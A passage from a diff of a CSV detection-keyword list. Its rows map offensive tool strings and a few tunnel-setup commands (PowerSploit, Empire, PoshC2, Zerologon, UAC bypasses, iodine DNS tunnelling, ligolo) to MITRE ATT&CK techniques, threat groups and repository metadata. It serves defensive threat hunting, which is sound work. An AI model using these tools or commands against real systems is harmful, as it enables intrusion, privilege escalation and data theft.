- T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1145","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-WinlogonCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-WinlogonCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-winPEAS*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-winPEAS*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*invoke-winrmsession*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-WireTap*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-WlanProfilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-WmiCommand *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-WinlogonCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-winPEAS*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-winPEAS*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invoke-winrmsession*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-WireTap*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-WlanProfilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-WmiCommand *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-WmiCommand*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" -"*invoke-wmiexec *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*invoke-wmiexec *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Invoke-WMIExec*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-WMIExec*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*invoke-wmijspayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*invoke-wmipayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*invoke-wmijspayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*invoke-wmipayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Invoke-WmiShadowCopy*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" -"*Invoke-WScriptBypassUAC*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"*Invoke-WScriptBypassUAC*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WScriptBypassUAC.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-WscriptElevate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WScriptBypassUAC.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-WScriptBypassUAC*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*Invoke-WScriptBypassUAC*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WScriptBypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-WscriptElevate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WScriptBypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ZeroLogon*","offensive_tool_keyword","Invoke-ZeroLogon","Zerologon CVE exploitation","T1210 - T1212 - T1216 - T1003.001 - T1003.002 - T1003.003 - T1003.004","TA0001 - TA0004 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY/Invoke-ZeroLogon","1","1","N/A","N/A","3","203","46","2020-10-14T04:42:58Z","2020-09-17T05:01:46Z" -"*Invoke-Zerologon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoking CreateSvcRpc (by @x86matthew*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*Invoke-Zerologon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoking CreateSvcRpc (by @x86matthew*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*io_dirtycow.c*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*io_dirtycow.so*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*iodine -*","offensive_tool_keyword","iodine","tunnel IPv4 over DNS tool","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0002","N/A","N/A","Data Exfiltration","https://linux.die.net/man/8/iodine","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -12460,43 +12616,43 @@ "*iomoath/PowerShx*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*ionide *","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0002","N/A","N/A","Data Exfiltration","https://linux.die.net/man/8/iodine","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ionided *","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0002","N/A","N/A","Data Exfiltration","https://linux.die.net/man/8/iodine","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ios7tojohn.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ios7tojohn.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*ip link set ligolo up*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ip link set ligolo up*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ip route add * dev ligolo*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ip tuntap add user root mode tun ligolo*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*IPeerToPeerService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*IPfuscation.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - 